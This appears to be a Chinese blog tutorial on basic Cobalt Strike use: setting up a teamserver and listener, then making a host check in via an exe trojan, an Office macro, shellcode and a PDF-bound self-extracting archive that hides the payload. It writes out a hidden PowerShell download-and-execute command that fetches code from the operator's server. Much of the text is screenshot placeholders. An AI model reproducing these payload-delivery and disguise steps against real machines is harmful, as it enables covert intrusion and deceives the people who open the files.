cobalt strike基础使用

coblat strike使用

服务搭建

首先将server端文件放进kali中

image-20231212193304738

对其赋权

image-20231212193638023

执行时需要root权限

设置ip

启动服务

./teamserver 10.4.7.138 123456

image-20231212194014237

回到win11启动cs,输入刚才配置的信息

image-20231212194210950

上线方式

木马(exe上线)

查看一下开放的端口

image-20231212195247967

添加监听

image-20231212195709609

再查看端口就发现一个新的监听端口

image-20231212195747671

新建木马

image-20231212195857878

image-20231212195929414

如果使用耳机添加过监听的话,选择choose就行了

执行一下木马,主机就上线了

image-20231212200311775

右键选择interact可以进入beacon会话

此时可以将sleep设为3

image-20231212200536161

直接用问号就可以看能使用的命令字

image-20231212200614616

也可以执行命令

shell whoami

image-20231212200912783

点击这个可以看到连接关系

image-20231212201144509

宏病毒

image-20231212202832048

输入个名字创建一下

image-20231212203110610

选择ms office

image-20231212203148817

生成之后选择复制

image-20231212203238342

内容粘贴进去

image-20231212203520457

生成的文件双击点击上线

image-20231212203926501

powershell

image-20231212205049332

同样选择监听对象然后生成

image-20231212205117277

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.4.7.138:80/a'))"

powershell中执行一下,主机上线

image-20231212205237569

shellcode

image-20231212205709035

仍然是选择监听对象然后生成

可以记事本打开看看

image-20231212205757425

这些数据格式其实就是硬编码加x

image-20231212210056630

可以使用加载器将这串编成exe格式

首先生成一个木马,然后贴进去一个pdf文件

image-20231212212828388

选中两个选择添加压缩文件

image-20231212212851615

勾选创建自解压文件

image-20231212212933306

image-20231212213845230

image-20231212213950585

image-20231212214010757

image-20231212214051266

image-20231212214947911

此处需要将光标放在fdp之前,插入完成后可以看到

image-20231212215020077

双击之后主机就会上线

image-20231212215119187

并且打开pdf文件

image-20231212215150510

插件

image-20231212215350209

image-20231212215401142

image-20231212215427653

重载后发现多了一个巨龙拉冬

image-20231212215515044

相关推荐

  1. React 基础使用

    2023-12-13 02:56:03       31 阅读

最近更新

  1. TCP协议是安全的吗?

    2023-12-13 02:56:03       16 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2023-12-13 02:56:03       16 阅读
  3. 【Python教程】压缩PDF文件大小

    2023-12-13 02:56:03       15 阅读
  4. 通过文章id递归查询所有评论(xml)

    2023-12-13 02:56:03       18 阅读

热门阅读

  1. gitblit自建git仓库

    2023-12-13 02:56:03       37 阅读
  2. 网络编程发送接受多案例

    2023-12-13 02:56:03       39 阅读
  3. C++学习笔记(十四)

    2023-12-13 02:56:03       35 阅读
  4. python 中Windows编程一些心得

    2023-12-13 02:56:03       44 阅读
  5. 【算法集训】基础数据结构:四、栈

    2023-12-13 02:56:03       44 阅读
  6. linux链表应用2

    2023-12-13 02:56:03       40 阅读
  7. 2.2运行时数据区域----2.2.3本地方法栈

    2023-12-13 02:56:03       36 阅读
  8. Linux中的iptables

    2023-12-13 02:56:03       32 阅读
  9. vue:this.reload()跟this.$router.replace的区别

    2023-12-13 02:56:03       44 阅读
  10. C语言L / 数据在内存中的存储

    2023-12-13 02:56:03       31 阅读
  11. c# 十进制整数格式化-(占位符,补齐)

    2023-12-13 02:56:03       47 阅读
  12. 申论笔记(思路技巧)

    2023-12-13 02:56:03       37 阅读
  13. 分享一个Pinia存储的数据持久化插件

    2023-12-13 02:56:03       37 阅读